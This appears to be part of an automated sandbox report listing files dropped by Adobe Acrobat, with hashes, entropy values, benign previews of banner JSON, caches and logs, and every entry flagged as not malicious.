                                                                                  Size (bytes):1123
                                                                                  Entropy (8bit):5.684700283510713
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:Yv6XRnkzv3epLgE9cQx8LennAvzBvkn0RCmK8czOCCSh:Yv8nsPehgy6SAFv5Ah8cv/h
                                                                                  MD5:AC82FA46DCACADC425A2D2DD9958C1D4
                                                                                  SHA1:EA3F42AF3F415E2F21C969DDED9A38456953D1DA
                                                                                  SHA-256:B40B1E164CA2A255BD026A49E89BE80B74676BFEF1BDD62932239977B21A79C0
                                                                                  SHA-512:67B7866F48BA1371E3112ADA8A95774DDA7F53C3611D62AA7FAED1E5D447C61431E3CA2F6FBA407991A1DE52F48DB2658F4589AFAB471D0B029A48B9542BC924
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"2e84be51-182a-462a-bed7-5a9c3ecc4445","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737079791869,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):289
                                                                                  Entropy (8bit):5.274783061639261
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:YEQXJ2HXFruIfHHdVoZcg1vRcR0Yt2KoAvJf8dPeUkwRe9:YvXKXFbHHkZc0v35GU8Ukee9
                                                                                  MD5:A02CDF5FCF133B58942B1F420DEB66F1
                                                                                  SHA1:17863B70A35CA32C5BA909F36757CE10B72ACA4F
                                                                                  SHA-256:E3A8A4F534A921C1CD1E5628F642149555D0192104C1CC44D9368D2204D44F86
                                                                                  SHA-512:3B965B1256B358465A876289E1CDBB2A61789A862029943EF5C2F4A423D49F7D7C4B67715BEC725D3B65C7E6B3194571684819BD0959E70874C0586A65CC9E73
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"2e84be51-182a-462a-bed7-5a9c3ecc4445","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737079791869,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):292
                                                                                  Entropy (8bit):5.27869878911606
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:YEQXJ2HXFruIfHHdVoZcg1vRcR0Yt2KoAvJfQ1rPeUkwRe9:YvXKXFbHHkZc0v35GY16Ukee9
                                                                                  MD5:41D4526C434E3B0504595113152E9559
                                                                                  SHA1:AB061585863A31F5A1DB520D4281D6D9E639E02D
                                                                                  SHA-256:A38233950128FEC71D01521C5F55E8271585CCF8DB8B19B002117BA3818CEBE8
                                                                                  SHA-512:4A12126653AEBCA7946D8A7856721C5AA0FFDEA36195ECB77E410E272BD8080A9FF4365199E571E0932944D00B04809BBBA84DFE07092A618313D3FE61BF4854
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"2e84be51-182a-462a-bed7-5a9c3ecc4445","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737079791869,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):289
                                                                                  Entropy (8bit):5.285545763007952
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:YEQXJ2HXFruIfHHdVoZcg1vRcR0Yt2KoAvJfFldPeUkwRe9:YvXKXFbHHkZc0v35Gz8Ukee9
                                                                                  MD5:199FAFB9836B3182B4DFA8CFB9A2DB53
                                                                                  SHA1:E971EBA1A8A89951883DA72E50BD573C3EE6E024
                                                                                  SHA-256:7F8B533B0C3198043FD6FC6EE0F509D282C6F17581C2390CEA06CD86E4391DB8
                                                                                  SHA-512:70F0BF1917D43193812A70D2013935BCB6F6C8DE5C458C12454772C8D494E7B5DC20D930A63121377D85E2D6A168FC0211A3FF5720A387DCB9577DB1B2D3B105
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"2e84be51-182a-462a-bed7-5a9c3ecc4445","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737079791869,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):295
                                                                                  Entropy (8bit):5.300459113814725
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:YEQXJ2HXFruIfHHdVoZcg1vRcR0Yt2KoAvJfzdPeUkwRe9:YvXKXFbHHkZc0v35Gb8Ukee9
                                                                                  MD5:CA5096B6E23B973C1E487442D5938F3A
                                                                                  SHA1:0F24E5BB5128A1B3E3DB5AF782F3E7FD7A823DA4
                                                                                  SHA-256:E1776A2CDB0FC268B9A1AEBB5B7BEE81CD0828092D44747B86E02382EA4C275D
                                                                                  SHA-512:205C00F5B79A6B4E4AE689ACD73E5DF59D589A4F24D041F17E7E1F2AD97589DB268C8906CE3F789965E84C9A8EB7A419D7206BC8640F36440DA649FE7121FD01
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"2e84be51-182a-462a-bed7-5a9c3ecc4445","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737079791869,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):289
                                                                                  Entropy (8bit):5.280987852997192
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:YEQXJ2HXFruIfHHdVoZcg1vRcR0Yt2KoAvJfYdPeUkwRe9:YvXKXFbHHkZc0v35Gg8Ukee9
                                                                                  MD5:7D67E6C7FE8355FFE402BB3A989089DF
                                                                                  SHA1:A7B77A86B75A56F621763EE1B7D679D30EC88053
                                                                                  SHA-256:0ECCD3747620302CEE9392C92817911EB7D32C279669A2177520DBF52339E6ED
                                                                                  SHA-512:9B35A052375B1C870162D5B728937E224030F90CABF3AA01A6A1886EAC84762DD57EEB673039BCC8F5A908ACE30D923E8A0BCC7911BC287DCDDBBF84A3CF51DD
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"2e84be51-182a-462a-bed7-5a9c3ecc4445","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737079791869,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):284
                                                                                  Entropy (8bit):5.267552345911788
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:YEQXJ2HXFruIfHHdVoZcg1vRcR0Yt2KoAvJf+dPeUkwRe9:YvXKXFbHHkZc0v35G28Ukee9
                                                                                  MD5:5DBAECA88EAFAF08E3A77B50943906D8
                                                                                  SHA1:FDCB2C98830F9802067D9E0B0FB5580E6720E09B
                                                                                  SHA-256:2ADB8F033EA0DBE78B5604507F48190CB30937717F77B1E725238C5D8E28DC76
                                                                                  SHA-512:7312760685D0D7F303ACF2DBE36AE17519EEF5B96E9A7A2701732F3E31606EAD41D33062A97BADC0E6B6BCE15D072A162FB69E936B69B4D439BE8E43EC3FB0A9
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"2e84be51-182a-462a-bed7-5a9c3ecc4445","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737079791869,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):291
                                                                                  Entropy (8bit):5.264665618348052
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:YEQXJ2HXFruIfHHdVoZcg1vRcR0Yt2KoAvJfbPtdPeUkwRe9:YvXKXFbHHkZc0v35GDV8Ukee9
                                                                                  MD5:28ADD43EED6F9DCAC1DEE45F19CC5935
                                                                                  SHA1:43A38943876738B318FD56E825F8EFD7352C2195
                                                                                  SHA-256:35C0BB261A898F4EBC23A90BD2FDBAEE0BDF9C52B7CBED00A61754C017A88141
                                                                                  SHA-512:7FF2B369ABD41510F2C508D3AC98EDFDB8C215AAD595F330C91769F8A18B4A1A10225CF3EE4BF47A3268A8DCA97B83344BC94A21FFFEDCEA4F8047B386939707
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"2e84be51-182a-462a-bed7-5a9c3ecc4445","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737079791869,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):287
                                                                                  Entropy (8bit):5.269349780064927
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:YEQXJ2HXFruIfHHdVoZcg1vRcR0Yt2KoAvJf21rPeUkwRe9:YvXKXFbHHkZc0v35G+16Ukee9
                                                                                  MD5:B288E814FB57C11E3BE182B4505BF9F2
                                                                                  SHA1:51AE1BF993E5226BA822F232C367C6C7D4EE4086
                                                                                  SHA-256:D19710FDAD3603ABF8E471A41F53065E6A9ABAF56B137D0128CB5061EA6BE0A4
                                                                                  SHA-512:BCECC8604DC25BFD9D5DECD5CCCA771162BD5F4C76B6AB40060A1DEF9836E058020A1F8462D68A0AB7C6E60F740A97F5BBEA223E71643424F574FE73B82751D8
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"2e84be51-182a-462a-bed7-5a9c3ecc4445","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737079791869,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):1090
                                                                                  Entropy (8bit):5.661019306402765
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:Yv6XRnkzv3CamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSh:Yv8nsPcBgkDMUJUAh8cvMh
                                                                                  MD5:1C7F14DCE2B5083A11691054F32D691C
                                                                                  SHA1:ACAE903532C8F795AA735936EBD38DCF10E668F5
                                                                                  SHA-256:DC0A61F4C53E9B71E7207DAA879C35481F3764FC637643A81B6861340B9955FC
                                                                                  SHA-512:89C5D355D6660B7F37AC5ED9055FD99DC3BAADC62C960D6F8887FB58F4407CF93872197FACB8A8E95BE9C368CE5A29EDBE0A166EC96681172AA37FAAF94FFE03
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"2e84be51-182a-462a-bed7-5a9c3ecc4445","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737079791869,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):286
                                                                                  Entropy (8bit):5.246190039609687
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:YEQXJ2HXFruIfHHdVoZcg1vRcR0Yt2KoAvJfshHHrPeUkwRe9:YvXKXFbHHkZc0v35GUUUkee9
                                                                                  MD5:43F6BA177AAA1906DD6B2B4E5B564837
                                                                                  SHA1:7F70C14FED62F6D0C5AB02EDC44BCE48FCAD75AD
                                                                                  SHA-256:53188EB8EEE7CDF33C55E461ED8CC6D721A65BB470C46068337BBC06809D3266
                                                                                  SHA-512:42723D8B45D5FD1B6A776F86D15A30862B0B09EC48FDD160E731BD900FDFF3E404A955525138E5717938D0D10F26729957EDEF852BC6D026BF6170AB73C4A44E
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"2e84be51-182a-462a-bed7-5a9c3ecc4445","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737079791869,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):282
                                                                                  Entropy (8bit):5.259590293713084
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:YEQXJ2HXFruIfHHdVoZcg1vRcR0Yt2KoAvJTqgFCrPeUkwRe9:YvXKXFbHHkZc0v35GTq16Ukee9
                                                                                  MD5:CF6594014A8A1A0EFB2BD13B8E5AE59D
                                                                                  SHA1:D03B61AFE31DD2E7203D782ADEB10F7BF8B88FF7
                                                                                  SHA-256:E3E0E14B10E3FEFCC46BC6A268706C9D323B419F17F23F3DB67D2CE7A806315D
                                                                                  SHA-512:48B2A26F8542173A57D526580F44BD522AFCD2B955894C52A065B3BAFA0D5D707D4150F3BA8B742462EE671A81CC13321A14FD05C6942D1A8F8DDD22E2E7EA1D
                                                                                  Malicious:false
                                                                                  Preview:{"analyticsData":{"responseGUID":"2e84be51-182a-462a-bed7-5a9c3ecc4445","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737079791869,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):4
                                                                                  Entropy (8bit):0.8112781244591328
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:e:e
                                                                                  MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                  SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                  SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                  SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                  Malicious:false
                                                                                  Preview:....
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:JSON data
                                                                                  Category:dropped
                                                                                  Size (bytes):2814
                                                                                  Entropy (8bit):5.112650591911891
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:YUBf/aPkx3aym/i2EvTnIDap8In39jKj0SLqjSL2452LS1CsursiZ6s0Q5Zo90jK:YGzXTn+a+2sfD5jwrsiZ6QA90+
                                                                                  MD5:54386D8DA348F41DDE690F2D3DE0B231
                                                                                  SHA1:AAD4C58FACAC311C631A8CA6F1F96FCB728F6AC3
                                                                                  SHA-256:B895AF54EBB7196B5345D023B2CBAE62AB3DA5DD4C4BC97C15FDAC946AFC9378
                                                                                  SHA-512:2251DA8BB3FBC78C4CBD23B55026943BA3BBC1761DAAE1F736BD93871AEDB0D160EA09FF77839EA51E935C5918AD20F939CB4E15CC19D2F3981BC90DB18657A3
                                                                                  Malicious:false
                                                                                  Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"7a78fdd2133481febec364a2ce61884c","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1736906286000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"ce778bf34e592edee9d2a4ac936d6bee","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1736906286000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"6846351116b077c7620ce6d8a8cb40d2","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1736906286000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"d8f0a86cae75fb394df4a42e6adf70b2","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1736906286000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"af6e6705b023cfc6de3328feb5ee4c99","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1736906286000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"7adf5d3cf00fbdd124893e25f960b3a3","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                                                  Category:dropped
                                                                                  Size (bytes):12288
                                                                                  Entropy (8bit):1.1876523299570039
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:TGufl2GL7msEHUUUUUUUUHszhSvR9H9vxFGiDIAEkGVvpLszF:lNVmswUUUUUUUUHSh+FGSItHSF
                                                                                  MD5:C9C9EF03391E81F41ACC428EC167601E
                                                                                  SHA1:73E3D314D5BCB3CA7F500B2CCDEB0D5152E7B9CC
                                                                                  SHA-256:9CDF5708C824B52AA08992869E3757C734EBDF273CF44C9A9A7B729E81B18464
                                                                                  SHA-512:5BA82142DC0DD13AEED5FE971E42E6846DDDC43C9D646AE1E55E3A71701B08B52D1C98D5DED1BB78D77D65381B664FB654225509C9495EDC284A91A08E0035BB
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:SQLite Rollback Journal
                                                                                  Category:dropped
                                                                                  Size (bytes):8720
                                                                                  Entropy (8bit):1.6068586679030519
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:7Mc5KUUUUUUUUUUHszpvR9H9vxFGiDIAEkGVvU5qFl2GL7msOH:76UUUUUUUUUUHSNFGSItIKVmsa
                                                                                  MD5:0FA6D3619868C00AE52F3D1D4C5D2272
                                                                                  SHA1:B90FA5B92D2024A467EB768559F8A615AD8BC78A
                                                                                  SHA-256:1D05A3FA1C5330FC7F6F818BCF2CFBCE02974DA9E8FCD3DF57E82CD2338D7461
                                                                                  SHA-512:43DE2BAABEFDFCC024BF3B99012528A0C258BCCC6A786FEBF05B354EBDC047C6F7A2EDE2F6E37FA118F709A97F9C27B15A7B8B19C8E5268922D190CCE7889696
                                                                                  Malicious:false
                                                                                  Preview:.... .c......r.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................f.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):66726
                                                                                  Entropy (8bit):5.392739213842091
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:RNOpblrU6TBH44ADKZEgqa0VRfhXB12BExiFQQYN4ZNAxyl7Yyu:6a6TZ44ADEqlVRfhXB4BgI7JK
                                                                                  MD5:C284BC358B853C42945C3CC11A02B3D9
                                                                                  SHA1:373B9EB0279D76077A842CD8131AE3738DF8E9B3
                                                                                  SHA-256:4003D21C9944EEAB276709A5F086FC6F80A4D1693A4DED8FDA4066D063820C4B
                                                                                  SHA-512:1D3F9EE9DCCDF4ABC6FDBD6467473534FD677C1BC37C9A7A3F323E80B68D3F33B891E6401C1B186D1092AA393A28ECD70ECD00485645821C56CD5A2E594EA473
                                                                                  Malicious:false
                                                                                  Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):246
                                                                                  Entropy (8bit):3.5177502348333967
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K84sClQ:Qw946cPbiOxDlbYnuRKI9
                                                                                  MD5:8F49686BBC6657E2B31592BEBC2CC9A2
                                                                                  SHA1:4E8912CBB33744937BB6A72BCAEAC7120584B83E
                                                                                  SHA-256:3991A79B27C0A80F56DB39D281BA31D1576157B8F9FA097B4130A41362C24FFE
                                                                                  SHA-512:A8AFDD9319CB73FE66402EF671CA3CFCFBAD734136B8CA136A62F7D38D134AA32D92F677292BDB84A47C94D58A46F3E6DE6D5C248248658F502618B12B823E84
                                                                                  Malicious:false
                                                                                  Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.4./.0.1./.2.0.2.5. . .2.0.:.5.8.:.0.8. .=.=.=.....
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:PDF document, version 1.6, 0 pages
                                                                                  Category:dropped
                                                                                  Size (bytes):358
                                                                                  Entropy (8bit):5.0700115973687785
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:IngVMrexJzJT0y9VEQIFVmb/eu2g/86S1kxROO1uUlCZUlCg/yLCSyAAO:IngVMre9T0HQIDmy9g06JXlb4q4tlX
                                                                                  MD5:D4C8C9408F28FDD6D2EDD2636B876E78
                                                                                  SHA1:3F6555ADEDC8027F61F8854414A009EA6EB7C68A
                                                                                  SHA-256:35A3D38DB526A3C59B2488AC6DD0150FDAC9AA339D6DBA7204DA2C19E2E46792
                                                                                  SHA-512:D64B043CBCE16EFF8388A8707A284F50DB225C9191FB4612A7E3B4CFB7E9A59AF5CC95E27F76D6759AC05E6253FC17AA7B5CB9F66C5237C840D9E3CC486BE61C
                                                                                  Malicious:false
                                                                                  Preview:%PDF-1.6.%......1 0 obj.<</Pages 2 0 R/Type/Catalog>>.endobj.2 0 obj.<</Count 0/Kids[]/Type/Pages>>.endobj.3 0 obj.<<>>.endobj.xref..0 4..0000000000 65535 f..0000000016 00000 n..0000000061 00000 n..0000000107 00000 n..trailer..<</Size 4/Root 1 0 R/Info 3 0 R/ID[<5049B6815E16A94FAAD2EB9D32047E5D><5049B6815E16A94FAAD2EB9D32047E5D>]>>..startxref..127..%%EOF..
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:ASCII text, with very long lines (393)
                                                                                  Category:dropped
                                                                                  Size (bytes):16525
                                                                                  Entropy (8bit):5.345946398610936
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:zHIq8qrq0qoq/qUILImCIrImI9IWdFdDdoPtPTPtP7ygyAydy0yGV///X/J/VokV:nNW
                                                                                  MD5:8947C10F5AB6CFFFAE64BCA79B5A0BE3
                                                                                  SHA1:70F87EEB71BA1BE43D2ABAB7563F94C73AB5F778
                                                                                  SHA-256:4F3449101521DA7DF6B58A2C856592E1359BA8BD1ACD0688ECF4292BA5388485
                                                                                  SHA-512:B76DB9EF3AE758F00CAF0C1705105C875838C7801F7265B17396466EECDA4BCD915DA4611155C5F2AD1C82A800C1BEC855E52E2203421815F915B77AA7331CA0
                                                                                  Malicious:false
                                                                                  Preview:SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:088+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):16603
                                                                                  Entropy (8bit):5.35217123273046
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:R31CciNXGVbR9UmhNbsplUbu6ZUjFCKkfwXLJBRdQkNUmsKc8nB5CBC/erV+L+un:Eii1
                                                                                  MD5:DF7BD3EC14D24621346EE11DC8894E4A
